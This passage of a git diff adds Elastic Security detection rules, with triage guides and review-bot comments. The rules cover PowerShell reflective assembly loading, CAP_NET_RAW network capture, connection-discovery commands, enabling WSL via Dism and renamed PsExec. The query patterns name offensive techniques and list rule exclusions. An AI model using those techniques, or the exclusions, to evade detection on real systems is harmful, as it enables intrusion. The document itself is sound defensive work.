Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n ) and\n not powershell.file.script_block_text : (\n (\"CommonWorkflowParameters\" or \"RelatedLinksHelpInfo\") and\n \"HelpDisplayStrings\"\n ) and\n not (powershell.file.script_block_text :\n (\"Get-SolutionFiles\" or \"Get-VisualStudio\" or \"Select-MSBuildPath\") and\n file.name : \"PathFunctions.ps1\"\n ) and\n not file.path : C\\:\\\\\\\\Program?Files\\\\\\\\Microsoft?Monitoring?Agent\\\\\\\\Agent\\\\\\\\Health?Service?State\\\\\\\\Monitoring?Host?Temporary?Files*\\\\\\\\AvailabilityGroupMonitoring.ps1 and\n not user.id : \"S-1-5-18\"\n", + "references": [ + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": 
true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e26f042e-c590-4e82-8e05-41e81bd822ad", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1620", + "name": "Reflective Code Loading", + "reference": "https://attack.mitre.org/techniques/T1620/" + }, + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.001", + "name": "Dynamic-link Library Injection", + "reference": "https://attack.mitre.org/techniques/T1055/001/" + }, + { + "id": "T1055.002", + "name": "Portable Executable Injection", + "reference": "https://attack.mitre.org/techniques/T1055/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": 
"https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 112 + }, + "id": "e26f042e-c590-4e82-8e05-41e81bd822ad_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_212.json b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_212.json new file mode 100644 index 00000000000..236d8d3c700 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_212.json 
@@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of Reflection.Assembly to load PEs and DLLs in memory in PowerShell scripts. Attackers use this method to load executables and DLLs without writing to the disk, bypassing security solutions.", + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files*\\\\AvailabilityGroupMonitoring.ps1" + } + } + } + } + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious .NET Reflection via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n ) and\n not powershell.file.script_block_text : (\n (\"CommonWorkflowParameters\" or \"RelatedLinksHelpInfo\") and\n \"HelpDisplayStrings\"\n ) and\n not (powershell.file.script_block_text :\n (\"Get-SolutionFiles\" or \"Get-VisualStudio\" or \"Select-MSBuildPath\") and\n file.name : \"PathFunctions.ps1\"\n ) and\n not user.id : \"S-1-5-18\"\n", + "references": [ + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e26f042e-c590-4e82-8e05-41e81bd822ad", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with 
Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1620", + "name": "Reflective Code Loading", + "reference": "https://attack.mitre.org/techniques/T1620/" + }, + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.001", + "name": "Dynamic-link Library Injection", + "reference": "https://attack.mitre.org/techniques/T1055/001/" + }, + { + "id": "T1055.002", + "name": "Portable Executable Injection", + "reference": "https://attack.mitre.org/techniques/T1055/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 212 + }, + "id": "e26f042e-c590-4e82-8e05-41e81bd822ad_212", + "type": "security-rule" +} \ No newline at end of file 
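Review bot: The `filters` entry keys on `file.path`, but `required_fields` lists `file.name` and never `file.path`; if `required_fields` is meant to cover fields referenced by filters as well as by `query`, add `{ "ecs": true, "name": "file.path", "type": "keyword" }` next to the `file.name` entry. The exclusion itself is reasonably narrow (fixed prefix under `Program Files`, wildcard only on the temporary-files directory), but nothing in `note` tells an analyst it exists; a one-line mention under "False positive analysis" would make the tuning visible. The same applies to `not user.id : "S-1-5-18"`, which takes every SYSTEM-context script block out of scope — worth stating in the triage guide as a deliberate coverage trade-off rather than leaving it implicit in the query.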
diff --git a/packages/security_detection_engine/kibana/security_rule/e28b8093-833b-4eda-b877-0873d134cf3c_2.json b/packages/security_detection_engine/kibana/security_rule/e28b8093-833b-4eda-b877-0873d134cf3c_2.json new file mode 100644 index 00000000000..a6d60cb85ee --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e28b8093-833b-4eda-b877-0873d134cf3c_2.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the ability of a process to be able to create RAW and PACKET socket types for the available network namespaces by a non-root user. A malicious process with this capability may exploit routing between hosts, bypass network access controls, and otherwise tamper with host networking if a firewall is not in place to limit the packet types and contents. The CAP_NET_RAW capability allows the process to bind to any address within the available namespaces, which allows network traffic sniffing by a non root user. The rule identifies previously unknown processes executing with CAP_NET_RAW capabilities through the use of the new terms rule type.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Network Traffic Capture via CAP_NET_RAW", + "new_terms_fields": [ + "host.id", + "user.id", + "process.executable" + ], + "query": "event.category:\"process\" and host.os.type:\"linux\" and event.type:\"start\" and event.action:\"exec\" and process.name:* and\n(process.thread.capabilities.effective:\"CAP_NET_RAW\" or process.thread.capabilities.permitted:\"CAP_NET_RAW\") and\nnot user.id:\"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.effective", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.permitted", + "type": "keyword" 
+ }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e28b8093-833b-4eda-b877-0873d134cf3c", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1040", + "name": "Network Sniffing", + "reference": "https://attack.mitre.org/techniques/T1040/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 2 + }, + "id": "e28b8093-833b-4eda-b877-0873d134cf3c_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_3.json b/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_3.json new file mode 100644 index 00000000000..83c2faf9935 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_3.json 
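Review bot: The `setup` text links the agent-policy guide at a pinned version (`https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`) while the two neighbouring links in the same block use `/current/`; floating it to `https://www.elastic.co/guide/en/fleet/current/agent-policy.html` keeps the block consistent and avoids a stale-doc link once 8.10 ages out. The rule has no `note` field even though `description` explains a non-trivial capability misuse; as I understand `new_terms` rules, this one alerts only when a `host.id`/`user.id`/`process.executable` combination is unseen within `history_window_start` (14 days), and a short triage note saying so would help analysts interpret a single low-severity hit.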
@@ -0,0 +1,84 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Adversaries may attempt to get a listing of network connections to or from a compromised system.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "System Network Connections Discovery", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nprocess.name in (\"netstat\", \"lsof\", \"who\", \"w\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e2dc8f8c-5f16-42fa-b49e-0eb8057f7444", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1049", + "name": "System Network Connections Discovery", + "reference": "https://attack.mitre.org/techniques/T1049/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_3", + "type": "security-rule" +} \ No newline at end of file 
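Review bot: The `query` has no `host.os.type` constraint although `tags` declares `OS: Linux` and `OS: macOS` and the `index` list includes `logs-endpoint.events.*`, which also carries Windows process events; the names `netstat`, `lsof`, `who` and `w` are unlikely to match there, but making the scope explicit keeps the rule consistent with its tags. Prefixing the condition with `host.os.type in ("linux", "macos") and` and adding `{ "ecs": true, "name": "host.os.type", "type": "keyword" }` to `required_fields` would do it.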
diff --git a/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_7.json b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_7.json new file mode 100644 index 00000000000..38c0f64b4a1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_7.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to enable the Windows Subsystem for Linux using Microsoft Dism utility. Adversaries may enable and use WSL for Linux to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Subsystem for Linux Enabled via Dism Utility", + "note": "## Triage and analysis\n\n### Investigating Windows Subsystem for Linux Enabled via Dism Utility\n\nThe Windows Subsystem for Linux (WSL) lets developers install a Linux distribution (such as Ubuntu, OpenSUSE, Kali, Debian, Arch Linux, etc) and use Linux applications, utilities, and Bash command-line tools directly on Windows, unmodified, without the overhead of a traditional virtual machine or dualboot setup. Attackers may abuse WSL to avoid security protections on a Windows host and perform a wide range of attacks.\n\nThis rule identifies attempts to enable WSL using the Dism utility. It monitors for the execution of Dism and checks if the command line contains the string \"Microsoft-Windows-Subsystem-Linux\". \n\n### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This is a dual-use tool, meaning its usage is not inherently malicious. 
Analysts can dismiss the alert if the administrator is aware of the activity, no other suspicious activity was identified, and WSL is homologated and approved in the environment.\n\n### Related Rules\n\n- Execution via Windows Subsystem for Linux - db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd\n- Suspicious Execution via Windows Subsystem for Linux - 3e0eeb75-16e8-4f2f-9826-62461ca128b7\n- Host Files System Changes via Windows Subsystem for Linux - e88d1fe9-b2f4-48d4-bace-a026dc745d4b\n- Windows Subsystem for Linux Distribution Installed - a1699af0-8e1e-4ed0-8ec1-89783538a061\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type : \"start\" and\n (process.name : \"Dism.exe\" or ?process.pe.original_file_name == \"DISM.EXE\") and \n process.command_line : \"*Microsoft-Windows-Subsystem-Linux*\"\n", + "references": [ + "https://blog.f-secure.com/hunting-for-windows-subsystem-for-linux/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e2e0537d-7d8f-4910-a11d-559bcf61295a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": 
"eql", + "version": 7 + }, + "id": "e2e0537d-7d8f-4910-a11d-559bcf61295a_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_110.json b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_110.json new file mode 100644 index 00000000000..0762cbaa301 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_110.json 
@@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious psexec activity which is executing from the psexec service that has been renamed, possibly to evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Process Execution via Renamed PsExec Executable", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Execution via Renamed PsExec Executable\n\nPsExec is a remote administration tool that enables the execution of commands with both regular and SYSTEM privileges on Windows systems. It operates by executing a service component `Psexecsvc` on a remote system, which then runs a specified process and returns the results to the local system. Microsoft develops PsExec as part of the Sysinternals Suite. Although commonly used by administrators, PsExec is frequently used by attackers to enable lateral movement and execute commands as SYSTEM to disable defenses and bypass security protections.\n\nThis rule identifies instances where the PsExec service component is executed using a custom name. 
This behavior can indicate an attempt to bypass security controls or detections that look for the default PsExec service component name.\n\n#### Possible investigation steps\n\n- Check if the usage of this tool complies with the organization's administration policy.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Identify the target computer and its role in the IT environment.\n- Investigate what commands were run, and assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. As long as the analyst did not identify suspicious activity related to the user or involved hosts, and the tool is allowed by the organization's policy, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - Prioritize cases involving critical servers and users.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full 